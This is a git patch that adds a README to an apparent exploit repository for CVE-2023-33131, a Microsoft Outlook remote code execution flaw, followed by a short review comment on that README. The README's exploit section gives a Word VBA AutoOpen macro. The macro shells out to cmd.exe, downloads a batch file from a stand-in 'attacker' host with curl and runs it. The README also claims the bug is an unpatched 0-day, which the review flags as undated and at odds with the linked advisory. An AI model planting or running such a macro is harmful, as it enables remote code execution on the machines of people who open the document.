From dc6babc68f1db324ccd733502c14872c6826d914 Mon Sep 17 00:00:00 2001 From: nu11secur1ty Date: Fri, 7 Jul 2023 15:06:18 +0300 Subject: [PATCH] Update README.MD --- 2023/CVE-2023-33131/README.MD | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/2023/CVE-2023-33131/README.MD b/2023/CVE-2023-33131/README.MD index a0de4cd..d238164 100644 --- a/2023/CVE-2023-33131/README.MD +++ b/2023/CVE-2023-33131/README.MD @@ -1,3 +1,30 @@ ## [CVE-2023-33131-Microsoft Outlook Remote Code Execution Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33131) ![](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2023/CVE-2023-33131/docs/Screenshot%202023-07-07%20144423.png) + +## Description: +In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content +to everyone who using the Outlook app, no matter web or local. +Microsoft still doesn't have a patch against this 0-day vulnerability today. + +## Staus: HIGH Vulnerability + +[+]Exploit: + +- The malicious Word file: + +```js +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus) +End Sub + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html) + +## Time spend: +00:30:00
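Review bot: The added Description attributes the flaw to Outlook, but the only technical content in the hunk is a Word `AutoOpen` macro that calls `Shell`, so the README never states which Outlook behaviour is at fault, which versions are affected, or under which macro settings the code runs; add those so a reader can judge exposure and choose a mitigation. The sentence "Microsoft still doesn't have a patch against this 0-day vulnerability today" is undated and sits under a heading that links to the MSRC update guide entry for the same CVE, so it should carry a date and be checked against that advisory. Smaller points: the fence is tagged `js` although the content is VBA, "Staus" should be "Status", "everyone who using" should be "everyone who is using", "Time spend" should be "Time spent", and the two links labelled `href` need descriptive link text.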